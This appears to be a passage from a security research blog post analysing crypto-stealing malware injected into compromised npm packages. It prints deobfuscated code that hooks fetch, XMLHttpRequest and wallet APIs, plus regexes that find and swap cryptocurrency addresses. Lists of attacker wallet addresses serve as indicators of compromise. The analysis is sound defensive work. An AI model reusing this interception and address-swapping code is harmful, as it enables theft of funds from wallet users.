let result = undefined;
if (isJSon) {
const json = await resultClone.json();
result = _0x19ca67(json, (typeof json) === `object`);
} else {
const text = await resultClone.text();
result = _0x19ca67(text, (typeof text) === `object`);
}
let resultStr = undefined;
if (typeof result === `string`) {
resultStr = result;
} else {
resultStr = JSON.stringify(result);
}
const status = fetchResult.status;
const statusText = fetchResult.statusText;
const resultObj = {
status: status,
statusText: statusText,
headers: headerers,
};
return new Response(resultStr, resultObj);
};
XMLHttpRequest.prototype.open = function(a, url, c, d, e ) {
this._url = url;
return XMLHttpRequest.prototype.open.apply(this, arguments.length);
};
XMLHttpRequest.prototype.send = function(a) {
const req = this;
const sendArgs = arguments;
req.onreadystatechange = function( ) {
if (req.readyState === 4) {
try {
const contentType = req.getResponseHeader(`Content-Type`) || '';
const text = req.responseText;
const isJson = contentType.includes(`application/json`);
let result = undefined;
if (isJson) {
const jsonStr = JSON.parse(req.responseText);
result = _0x19ca67(jsonStr, typeof jsonStr === `object`);
} else {
result = _0x19ca67(text, typeof text === `object`);
}
let resultStr = undefined;
if ((typeof result) === `string`) {
resultStr = result;
} else {
resultStr = JSON.stringify(result);
}
Object.defineProperty(req, `responseText`, { value: resultStr });
Object.defineProperty(req, `response`, { value: resultStr });
} catch (err) {
}
}
if (req.onreadystatechange) {
req.onreadystatechange.apply(this, arguments);
}
};
return XMLHttpRequest.prototype.send.apply(req, sendArgs);
};The malware follows these steps:
In more detail, the cyber threat actor spends time with initial setup, creating a heavily obfuscated function with variables using _0x prefixes, and a massive array with hundreds of obfuscated strings. It decodes these strings at runtime.
It then checks for wallets and prepares for interception, maintaining multiple arrays of cryptocurrency addresses.
0x (40+ addresses)1xxx), SegWit (bc1xxx), and P2SH (3xxx)It intercepts all fetch requests, parses the body, and if it’s a crypto transaction, replaces the recipient address. It achieves this by taking the transaction data as input and using regex to find cryptocurrency addresses.
const obj = Object.entries({
ethereum: new RegExp(\\\\\\\\b0x[a-fA-F0-9]{40}\\\\\\\\b, g),
bitcoinLegacy: new RegExp(\\\\\\\\b1[a-km-zA-HJ-NP-Z1-9]{25,34}\\\\\\\\b, g),
bitcoinSegwit: new RegExp(\\\\\\\\b(3[a-km-zA-HJ-NP-Z1-9]{25,34}|bc1[qpzry9x8gf2tvdw0s3jn54khce6mua7l]{11,71})\\\\\\\\b, g),
tron: new RegExp(((?<!\\\\\\\\w)[T][1-9A-HJ-NP-Za-km-z]{33}), g),
bch: new RegExp(bitcoincash:[qp][a-zA-Z0-9]{41}, g),
ltc: new RegExp((?<!\\\\\\\\w)ltc1[qpzry9x8gf2tvdw0s3jn54khce6mua7l]{11,71}\\\\\\\\b, g),
ltc2: new RegExp((?<!\\\\\\\\w)[mlML][a-km-zA-HJ-NP-Z1-9]{25,34}, g),
solana: new RegExp(((?<!\\\\\\\\w)[4-9A-HJ-NP-Za-km-z][1-9A-HJ-NP-Za-km-z]{32,44}), g),
solana2: new RegExp(((?<!\\\\\\\\w)[3][1-9A-HJ-NP-Za-km-z]{35,44}), g),
solana3: new RegExp(((?<!\\\\\\\\w)[1][1-9A-HJ-NP-Za-km-z]{35,44}), g),
});
for (const [_0x17ccd4, rex] of obj) {
const regexResult/:unknown/ = _0x530d91.match(rex);
for (const identifiedVictimAddress of regexResult) {
if (_0x17ccd4 == ethereum) {
if (!_0x4477fc.includes(identifiedVictimAddress)) {
_0x530d91 = _0x530d91.replace(identifiedVictimAddress, _0x2abae0(identifiedVictimAddress, _0x4477fc));Then, the threat actor can replace legitimate addresses with their own and return modified transaction data, making the original transaction appear successful.
The code specifically targets decentralized exchanges:
'0x7a250d5630b4cf539739df2c5dacb4c659f2488d': 'Uniswap V2' '0xe592427a0aece92de3edee1f18e0157c05861564': 'Uniswap V3' '0x10ed43c718714eb63d5aa57b78b54704e256024e': 'PancakeSwap' '0xd9e1ce17f2641f24ae83637ab66a2cca9c378b9f': 'SushiSwap' '0x1111111254eeb25477b68fb85ed929f73a960582': '1inch'
When transactions go to these routers, it modifies the recipient parameters.
For Ethereum, the code intercepts specific methods, like direct transaction sending (eth_sendTransaction), account listing (eth_accounts), and transaction signing (eth_signTransaction). It then continues its methodology of replacing the recipient address with its own, controlled address.
To evade, the code builds sensitive strings at runtime, indirect function calls, and maintains original HTTP status codes and headers.
The payload begins by checking typeof window !== 'undefined' to confirm it is running in a browser. It then hooks into window.fetch, XMLHttpRequest, and window.ethereum.request, along with other wallet provider APIs. This means the malware targets end users with connected wallets who visit a site that includes the compromised code. Developers are not inherently the target, but if they open an affected site in a browser and connect a wallet, they too become victims.
In summary, the threat proceeds as follows:
Although the exact code of the malware between the beginning of the campaign, targeting qix, and the next phase of the campaign targeting proto-tinker-wc, differ slightly, the functionality of the code remains the same. The new code deploys even more deobfuscation techniques. The core functions related to detecting the Ethereum provider, intercepting fetch and XmlHttpRequests, and handling Ethereum transaction methods like eth_accounts and eth_sendTransactions, are heavily obfuscated. It targets the downstream consumers of the packages.
Snapshot of a diff of a previously compromised file supports-hyperlinks (left) and proto-linker-wc(right).
This indicates an ongoing and adjusting campaign. It is possible we will continue to see action from this threat actor.
Malicious package publishes (UTC, Sep 8, 2025):
The following package versions have been confirmed as malicious:
Ethereum Addresses:
0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976 0xa29eeFb3f21Dc8FA8bce065Db4f4354AA683c024 0x40C351B989113646bc4e9Dfe66AE66D24fE6Da7B 0x30F895a2C66030795131FB66CBaD6a1f91461731 0x57394449fE8Ee266Ead880D5588E43501cb84cC7 0xCd422cCC9f6e8f30FfD6F68C0710D3a7F24a026A 0x7C502F253124A88Bbb6a0Ad79D9BeD279d86E8f4 0xe86749d6728d8b02c1eaF12383c686A8544de26A 0xa4134741a64F882c751110D3E207C51d38f6c756 0xD4A340CeBe238F148034Bbc14478af59b1323d67 0xB00A433e1A5Fc40D825676e713E5E351416e6C26 0xd9Df4e4659B1321259182191B683acc86c577b0f 0x0a765FA154202E2105D7e37946caBB7C2475c76a 0xE291a6A58259f660E8965C2f0938097030Bf1767 0xe46e68f7856B26af1F9Ba941Bc9cd06F295eb06D 0xa7eec0c4911ff75AEd179c81258a348c40a36e53 0x3c6762469ea04c9586907F155A35f648572A0C3E 0x322FE72E1Eb64F6d16E6FCd3d45a376efD4bC6b2 0x51Bb31a441531d34210a4B35114D8EF3E57aB727 0x314d5070DB6940C8dedf1da4c03501a3AcEE21E1 0x75023D76D6cBf88ACeAA83447C466A9bBB0c5966 0x1914F36c62b381856D1F9Dc524f1B167e0798e5E 0xB9e9cfd931647192036197881A9082cD2D83589C 0xE88ae1ae3947B6646e2c0b181da75CE3601287A4 0x0D83F2770B5bDC0ccd9F09728B3eBF195cf890e2 0xe2D5C35bf44881E37d7183DA2143Ee5A84Cd4c68 0xd21E6Dd2Ef006FFAe9Be8d8b0cdf7a667B30806d 0x93Ff376B931B92aF91241aAf257d708B62D62F4C 0x5C068df7139aD2Dedb840ceC95C384F25b443275 0x70D24a9989D17a537C36f2FB6d8198CC26c1c277 0x0ae487200606DEfdbCEF1A50C003604a36C68E64 0xc5588A6DEC3889AAD85b9673621a71fFcf7E6B56 0x3c23bA2Db94E6aE11DBf9cD2DA5297A09d7EC673 0x5B5cA7d3089D3B3C6393C0B79cDF371Ec93a3fd3 0x4Cb4c0E7057829c378Eb7A9b174B004873b9D769 0xd299f05D1504D0B98B1D6D3c282412FD4Df96109 0x241689F750fCE4A974C953adBECe0673Dc4956E0 0xBc5f75053Ae3a8F2B9CF9495845038554dDFb261 0x5651dbb7838146fCF5135A65005946625A2685c8 0x5c9D146b48f664f2bB4796f2Bb0279a6438C38b1 0xd2Bf42514d35952Abf2082aAA0ddBBEf65a00BA3 0xbB1EC85a7d0aa6Cd5ad7E7832F0b4c8659c44cc9 0x013285c02ab81246F1D68699613447CE4B2B4ACC 0x97A00E100BA7bA0a006B2A9A40f6A0d80869Ac9e 0x4Bf0C0630A562eE973CE964a7d215D98ea115693 0x805aa8adb8440aEA21fDc8f2348f8Db99ea86Efb 0xae9935793835D5fCF8660e0D45bA35648e3CD463 0xB051C0b7dCc22ab6289Adf7a2DcEaA7c35eB3027 0xf7a82C48Edf9db4FBe6f10953d4D889A5bA6780D 0x06de68F310a86B10746a4e35cD50a7B7C8663b8d 0x51f3C0fCacF7d042605ABBE0ad61D6fabC4E1F54 0x49BCc441AEA6Cd7bC5989685C917DC9fb58289Cf 0x7fD999f778c1867eDa9A4026fE7D4BbB33A45272 0xe8749d2347472AD1547E1c6436F267F0EdD725Cb 0x2B471975ac4E4e29D110e43EBf9fBBc4aEBc8221 0x02004fE6c250F008981d8Fc8F9C408cEfD679Ec3 0xC4A51031A7d17bB6D02D52127D2774A942987D39 0xa1b94fC12c0153D3fb5d60ED500AcEC430259751 0xdedda1A02D79c3ba5fDf28C161382b1A7bA05223 0xE55f51991C8D01Fb5a99B508CC39B8a04dcF9D04
Solana Addresses:
5VVyuV5K6c2gMq1zVeQUFAmo8shPZH28MJCVzccrsZG6 98EWM95ct8tBYWroCxXYN9vCgN7NTcR6nUsvCx1mEdLZ Gs7z9TTJwAKyxN4G3YWPFfDmnUo3ofu8q2QSWfdxtNUt CTgjc8kegnVqvtVbGZfpP5RHLKnRNikArUYFpVHNebEN 7Nnjyhwsp8ia2W4P37iWAjpRao3Bj9tVZBZRTbBpwXWU 3KFBge3yEg793VqVV1P6fxV7gC9CShh55zmoMcGUNu49 9eU7SkkFGWvDoqSZLqoFJ9kRqJXDQYcEvSiJXyThCWGV 4SxDspwwkviwR3evbZHrPa3Rw13kBr51Nxv86mECyXUF 4SxDspwwkviwR3evbZHrPa3Rw13kBr51Nxv86mECyXUF 9dtS7zbZD2tK7oaMUj78MKvgUWHbRVLQ95bxnpsCaCLL 7mdCoRPc1omTiZdYY2xG81EvGwN7Z2yodUTX9ZmLm3fx 8rdABs8nC2jTwVhR9axWW7WMbGZxW7JUzNV5pRF8KvQv 55YtaEqYEUM7ASAZ9XmVdSBNy6F7r5zkdLsJFv2ZPtAx Gr8Kcyt8UVRF1Pux7YHiK32Spm7cmnFVL6hd7LSLHqoB 9MRmVsciWKDvwwTaZQCK2NvJE2SeVU8W6EGFmukHTRaB 5j4k1Ye12dXiFMLSJpD7gFrLbv4QcUrRoKHsgo32kRFr F1SEspGoVLhqJTCFQEutTcKDubw44uKnqWc2ydz4iXtv G3UBJBY69FpDbwyKhZ8Sf4YULLTtHBtJUvSX4GpbTGQn DZyZzbGfdMy5GTyn2ah2PDJu8LEoKPq9EhAkFRQ1Fn6K HvygSvLTXPK4fvR17zhjEh57kmb85oJuvcQcEgTnrced
Bitcoin Legacy
1H13VnQJKtT4HjD5ZFKaaiZEetMbG7nDHx 1Li1CRPwjovnGHGPTtcKzy75j37K6n97Rd 1Dk12ey2hKWJctU3V8Akc1oZPo1ndjbnjP 1NBvJqc1GdSb5uuX8vT7sysxtT4LB8GnuY 1Mtv6GsFsbno9XgSGuG6jRXyBYv2tgVhMj 1BBAQm4DL78JtRdJGEfzDBT2PBkGyvzf4N 1KkovSeka94yC5K4fDbfbvZeTFoorPggKW 18CPyFLMdncoYccmsZPnJ5T1hxFjh6aaiV 1BijzJvYU2GaBCYHa8Hf3PnJh6mjEd92UP 1Bjvx6WXt9iFB5XKAVsU3TgktgeNbzpn5N 19fUECa9aZCQxcLeo8FZu8kh5kVWheVrg8 1DZEep7GsnmBVkbZR3ogeBQqwngo6x4XyR 1GX1FWYttd65J26JULr9HLr98K7VVUE38w 14mzwvmF2mUd6ww1gtanQm8Bxv3ZWmxDiC 1EYHCtXyKMMhUiJxXJH4arfpErNto5j87k 19D1QXVQCoCLUHUrzQ4rTumqs9jBcvXiRg 16mKiSoZNTDaYLBQ5LkunK6neZFVV14b7X 18x8S4yhFmmLUpZUZa3oSRbAeg8cpECpne 1EkdNoZJuXTqBeaFVzGwp3zHuRURJFvCV8 13oBVyPUrwbmTAbwxVDMT9i6aVUgm5AnKM 1DwsWaXLdsn4pnoMtbsmzbH7rTj5jNH6qS 13wuEH28SjgBatNppqgoUMTWwuuBi9e4tJ 154jc6v7YwozhFMppkgSg3BdgpaFPtCqYn 1AP8zLJE6nmNdkfrf1piRqTjpasw7vk5rb 19F8YKkU7z5ZDAypxQ458iRqH2ctGJFVCn 17J3wL1SapdZpT2ZVX72Jm5oMSXUgzSwKS 16z8D7y3fbJsWFs3U8RvBF3A8HLycCW5fH 1PYtCvLCmnGDNSVK2gFE37FNSf69W2wKjP 143wdqy6wgY3ez8Nm19AqyYh25AZHz3FUp 1JuYymZbeoDeH5q65KZVG3nBhYoTK9YXjm 1PNM2L1bpJQWipuAhNuB7BZbaFLB3LCuju 19onjpqdUsssaFKJjwuAQGi2eS41vE19oi 1JQ15RHehtdnLAzMcVT9kU8qq868xFEUsS 1LVpMCURyEUdE8VfsGqhMvUYVrLzbkqYwf 1KMcDbd2wecP4Acoz9PiZXsBrJXHbyPyG6 1DZiXKhBFiKa1f6PTGCNMKSU1xoW3Edb7Z 174bEk62kr8dNgiduwHgVzeLgLQ38foEgZ 17cvmxcjTPSBsF1Wi2HfcGXnpLBSzbAs6p 1NoYvnedUqNshKPZvSayfk8YTQYvoB2wBc 13694eCkAtBRkip8XdPQ8ga99KEzyRnU6a
Bitcoin SegWit
bc1qms4f8ys8c4z47h0q29nnmyekc9r74u5ypqw6wm bc1qznntn2q7df8ltvx842upkd9uj4atwxpk0whxh9 bc1q4rllc9q0mxs827u6vts2wjvvmel0577tdsvltx bc1qj8zru33ngjxmugs4sxjupvd9cyh84ja0wjx9c4 bc1qc972tp3hthdcufsp9ww38yyer390sdc9cvj8ar bc1qw0z864re8yvrjqmcw5fs6ysndta2avams0c6nh bc1qzdd8c7g2g9mnnxy635ndntem2827ycxxyn3v4h bc1qaavgpwm98n0vtaeua539gfzgxlygs8jpsa0mmt bc1qrdlkyhcrx4n2ksfjfh78xnqrefvsr34nf2u0sx bc1q9ytsyre66yz56x3gufhqks7gqd8sa8uk4tv5fh bc1qfrvsj2dkey2dg8ana0knczzplcqr7cgs9s52vq bc1qg7lkw04hg5yggh28ma0zvtkeg95k0yefqmvv2f bc1qmeplum3jy2vrlyzw4vhrcgeama35tr9kw8yfrn bc1qamqx0h8rxfcs4l56egrpau4ryqu4r642ttmxq4 bc1qsaxgtck26mgecgfvp9ml4y5ljyl8ylpdglqz30 bc1qsz90ulta8dx5k8xzzjqruzahav2vxchtk2l8v7 bc1q3ad2zyc5mpc9nnzmmtxqpu467jeh4m928r7qf4 bc1qlrdqrulwmvfg86rmp77k8npdefns52ykk8cxs6 bc1q5hqxk5ugvf2d3y6qj2a7cy7u79ckusu9eknpsr bc1qszm3nugttmtpkq77dhphtqg4u7vuhxxcrh7f79 bc1qqc09xnyafq0y4af3x7j5998tglxcanjuzy974m bc1qqqh29zxfzxk0fvmq9d7hwedh5yz44zhf7e23qz bc1qsg57tpvfj6gysrw5w4sxf3dweju40g87uuclvu bc1qje95nehs8y0wvusp2czr25p7kghk6j3cvgugy5 bc1qwrnchp96p38u8ukp8jc8cq22q35n3ajfav0pzf bc1q6l99s704jccclxx5rc2x2c5shlgs2pg0fpnflk bc1qeuk2u6xl4rgfq0x9yc37lw49kutnd8gdlxt9st bc1qxul8lwxvt7lt9xuge0r2jls7evrwyyvcf2ah0u bc1qcplvxyzs9w09g6lpglj6xxdfxztfwjsgz95czd bc1q9ca9ae2cjd3stmr9lc6y527s0x6vvqys6du00u bc1qmap3cqss3t4vetg8z9s995uy62jggyxjk29jkp bc1qg3c6c7y5xeqkxnjsx9ymclslr2sncjrxjylkej bc1q9zx63qdjwldxp4s9egeqjelu3y5yqsajku8m29 bc1ql2awtv7nzcp2dqce3kny2ra3dz946c9vg2yukq bc1qhytpe64tsrrvgwm834q35w6607jc6azqtnvl2a bc1q4rlgfgjwg9g2pqwqkf5j9hq6ekn39rjmzv09my bc1q28ks0u6fhvv7hktsavnfpmu59anastfj5sq8dw bc1qjqfpxvl2j2hzx2cxeqhchrh02dcjy3z5k6gv55 bc1q8zznzs9z93xpkpunrmeqp6fg54s3q7dkh9z9xw bc1qt4c4e6xwt5dz4p629ndz9zmeep2kmvqgy53037
Tron
TB9emsCq6fQw6wRk4HBxxNnU6Hwt1DnV67 TSfbXqswodrpw8UBthPTRRcLrqWpnWFY3y TYVWbDbkapcKcvbMfdbbcuc3PE1kKefvDH TNaeGxNujpgPgcfetYwCNAZF8BZjAQqutc TJ1tNPVj7jLK2ds9JNq15Ln6GJV1xYrmWp TGExvgwAyaqwcaJmtJzErXqfra66YjLThc TC7K8qchM7YXZPdZrbUY7LQwZaahdTA5tG TQuqKCAbowuQYEKB9aTnH5uK4hNvaxDCye TFcXJysFgotDu6sJu4zZPAvr9xHCN7FAZp TLDkM4GrUaA13PCHWhaMcGri7H8A8HR6zR TPSLojAyTheudTRztqjhNic6rrrSLVkMAr TY2Gs3RVwbmcUiDpxDhchPHF1CVsGxU1mo TCYrFDXHBrQkqCPNcp6V2fETk7VoqjCNXw TKcuWWdGYqPKe98xZCWkmhc1gKLdDYvJ2f TP1ezNXDeyF4RsM3Bmjh4GTYfshf5hogRJ TJcHbAGfavWSEQaTTLotG7RosS3iqV5WMb TD5U7782gp7ceyrsKwekWFMWF9TjhC6DfP TEu3zgthJE32jfY6bYMYGNC7BU2yEXVBgW TK5r74dFyMwFSTaJF6dmc2pi7A1gjGTtJz TBJH4pB4QPo96BRA7x6DghEv4iQqJBgKeW TKBcydgFGX9q3ydaPtxht1TRAmcGybRozt TQXoAYKPuzeD1X2c4KvQ4gXhEnya3AsYwC TJCevwYQhzcSyPaVBTa15y4qNY2ZxkjwsZ THpdx4MiWbXtgkPtsrsvUjHF5AB4u7mx3E TWpCDiY8pZoY9dVknsy3U4mrAwVm8mCBh6 TK5zyFYoyAttoeaUeWGdpRof2qRBbPSV7L TAzmtmytEibzixFSfNvqqHEKmMKiz9wUA9 TCgUwXe3VmLY81tKBrMUjFBr1qPnrEQFNK TTPWAyW3Q8MovJvDYgysniq41gQnfRn21V TWUJVezQta4zEX94RPmFHF2hzQBRmYiEdn TPeKuzck7tZRXKh2GP1TyoePF4Rr1cuUAA TJUQCnHifZMHEgJXSd8SLJdVAcRckHGnjt TCgX32nkTwRkapNuekTdk1TByYGkkmcKhJ TFDKvuw86wduSPZxWTHD9N1TqhXyy9nrAs TQVpRbBzD1au3u8QZFzXMfVMpHRyrpemHL TSE2VkcRnyiFB4xe8an9Bj1fb6ejsPxa9Z THe32hBm9nXnzzi6YFqYo8LX77CMegX3v5 TXfcpZtbYfVtLdGPgdoLm6hDHtnrscvAFP TXgVaHDaEyXSm1LoJEqFgKWTKQQ1jgeQr7 TD5cRTn9dxa4eodRWszGiKmU4pbpSFN87P
Litecoin
LNFWHeiSjb4QB4iSHMEvaZ8caPwtz4t6Ug LQk8CEPMP4tq3mc8nQpsZ1QtBmYbhg8UGR LMAJo7CV5F5scxJsFW67UsY2RichJFfpP6 LUvPb1VhwsriAm3ni77i3otND2aYLZ8fHz LhWPifqaGho696hFVGTR1KmzKJ8ps7ctFa LZZPvXLt4BtMzEgddYnHpUWjDjeD61r5aQ LQfKhNis7ZKPRW6H3prbXz1FJd29b3jsmT LSihmvTbmQ9WZmq6Rjn35SKLUdBiDzcLBB Ldbnww88JPAP1AUXiDtLyeZg9v1tuvhHBP LR3YwMqnwLt4Qdn6Ydz8bRFEeXvpbNZUvA Lbco8vJ56o1mre6AVU6cF7JjDDscnYHXLP LfqFuc3sLafGxWE8vdntZT4M9NKq6Be9ox LLcmXxj8Zstje6KqgYb11Ephj8bGdyF1vP LcJwR1WvVRsnxoe1A66pCzeXicuroDP6L6 LUNKimRyxBVXLf9gp3FZo2iVp6D3yyzJLJ LY1NnVbdywTNmq45DYdhssrVENZKv7Sk8H LNmMqhqpyDwb1zzZReuA8aVUxkZSc4Ztqq LdxgXRnXToLMBML2KpgGkdDwJSTM6sbiPE LZMn8hLZ2kVjejmDZiSJzJhHZjuHq8Ekmr LVnc1MLGDGKs2bmpNAH7zcHV51MJkGsuG9 LRSZUeQb48cGojUrVsZr9eERjw4K1zAoyC LQpGaw3af1DQiKUkGYEx18jLZeS9xHyP9v LiVzsiWfCCkW2kvHeMBdawWp9TE8uPgi6V LY32ncFBjQXhgCkgTAd2LreFv3JZNTpMvR LdPtx4xqmA4HRQCm3bQ9PLEneMWLdkdmqg LYcHJk7r9gRbg2z3hz9GGj91Po6TaXDK3k LMhCVFq5fTmrwQyzgfp2MkhrgADRAVCGsk LPv1wSygi4vPp9UeW6EfWwepEeMFHgALmN Lf55UbTiSTjnuQ8uWzUBtzghztezEfSLvT LdJHZeBQovSYbW1Lei6CzGAY4d3mUxbNKs LbBxnFaR1bZVN2CquNDXGe1xCuu9vUBAQw LWWWPK2SZZKB3Nu8pHyq2yPscVKvex5v2X LYN4ESQuJ1TbPxQdRYNrghznN8mQt8WDJU LiLzQs4KU79R5AUn9jJNd7EziNE7r32Dqq LeqNtT4aDY9oM1G5gAWWvB8B39iUobThhe LfUdSVrimg54iU7MhXFxpUTPkEgFJonHPV LTyhWRAeCRcUC9Wd3zkmjz3AhgX6J18kxZ Lc2LtsEJmPYay1oj7v8xj16mSV15BwHtGu LVsGi1QVXucA6v9xsjwaAL8WYb7axdekAK LewV6Gagn52Sk8hzPHRSbBjUpiNAdqmB9z
Bitcoin Cash
bitcoincash:qpwsaxghtvt6phm53vfdj0s6mj4l7h24dgkuxeanyh bitcoincash:qq7dr7gu8tma7mvpftq4ee2xnhaczqk9myqnk6v4c9 bitcoincash:qpgf3zrw4taxtvj87y5lcaku77qdhq7kqgdga5u6jz bitcoincash:qrkrnnc5kacavf5pl4n4hraazdezdrq08ssmxsrdsf bitcoincash:qqdepnkh89dmfxyp4naluvhlc3ynej239sdu760y39 bitcoincash:qqul8wuxs4ec8u4d6arkvetdmdh4ppwr0ggycetq97 bitcoincash:qq0enkj6n4mffln7w9z6u8vu2mef47jwlcvcx5f823 bitcoincash:qrc620lztlxv9elhj5qzvmf2cxhe7egup5few7tcd3 bitcoincash:qrf3urqnjl4gergxe45ttztjymc8dzqyp54wsddp64 bitcoincash:qr7mkujcr9c38ddfn2ke2a0sagk52tllesderfrue8 bitcoincash:qqgjn9yqtud5mle3e7zhmagtcap9jdmcg509q56ynt bitcoincash:qpuq8uc9ydxszny5q0j4actg30he6uhffvvy0dl7er bitcoincash:qz0640hjl2m3n2ca26rknljpr55gyd9pjq89g6xhrz bitcoincash:qq0j6vl2ls2g8kkhkvpcfyjxns5zq03llgsqdnzl4s bitcoincash:qq8m8rkl29tcyqq8usfruejnvx27zxlpu52mc9spz7 bitcoincash:qpudgp66jjj8k9zec4na3690tvu8ksq4fq8ycpjzed bitcoincash:qqe3qc9uk08kxnng0cznu9xqqluwfyemxym7w2e3xw bitcoincash:qpukdxh30d8dtj552q2jet0pqvcvt64gfujaz8h9sa bitcoincash:qqs4grdq56y5nnamu5d8tk450kzul3aulyz8u66mjc bitcoincash:qp7rhhk0gcusyj9fvl2ftr06ftt0pt8wgumd8ytssd bitcoincash:qpmc3y5y2v7h3x3sgdg7npau034fsggwfczvuqtprl bitcoincash:qzum0qk4kpauy8ljspmkc5rjxe5mgam5xg7xl5uq2g bitcoincash:qqjqp8ayuky5hq4kgrarpu40eq6xjrneuurc43v9lf bitcoincash:qqxu6a3f0240v0mwzhspm5zeneeyecggvufgz82w7u bitcoincash:qpux2mtlpd03d8zxyc7nsrk8knarnjxxts2fjpzeck bitcoincash:qpcgcrjry0excx80zp8hn9vsn4cnmk57vylwa5mtz3 bitcoincash:qpjj6prm5menjatrmqaqx0h3zkuhdkfy75uauxz2sj bitcoincash:qp79qg7np9mvr4mg78vz8vnx0xn8hlkp7sk0g86064 bitcoincash:qr27clvagvzra5z7sfxxrwmjxy026vltucdkhrsvc7 bitcoincash:qrsypfz3lqt8xtf8ej5ftrqyhln577me6v640uew8j bitcoincash:qrzfrff4czjn6ku0tn2u3cxk7y267enfqvx6zva5w6 bitcoincash:qr7exs4az754aknl3r5gp9scn74dzjkcrgql3jpv59 bitcoincash:qq35fzg00mzcmwtag9grmwljvpuy5jm8kuzfs24jhu bitcoincash:qra5zfn74m7l85rl4r6wptzpnt2p22h7552swkpa7l bitcoincash:qzqllr0fsh9fgfvdhmafx32a0ddtkt52evnqd7w7h7 bitcoincash:qpjdcwld84wtd5lk00x8t7qp4eu3y0xhnsjjfgrs7q bitcoincash:qrgpm5y229xs46wsx9h9mlftedmsm4xjlu98jffmg3 bitcoincash:qpjl9lkjjp4s6u654k3rz06rhqcap849jg8uwqmaad bitcoincash:qra5uwzgh8qus07v3srw5q0e8vrx5872k5cxguu3h5 bitcoincash:qz6239jkqf9qpl2axk6vclsx3gdt8cy4z5rag98u2r
Subscribe to our newsletter
Get notified when we publish new security blog posts!
Try it now
Security News
/Research
Socket found a Rust typosquat (finch-rust) that loads sha-rust to steal credentials, using impersonation and an unpinned dependency to auto-deliver updates.
Research
/Security Fundamentals
A pair of typosquatted Go packages posing as Google’s UUID library quietly turn helper functions into encrypted exfiltration channels to a paste site, putting developer and CI data at risk.
Research
/Security News
We spotted a wave of auto-generated “elf-*” npm packages published every two minutes from new accounts, with simple malware variants and early takedowns underway.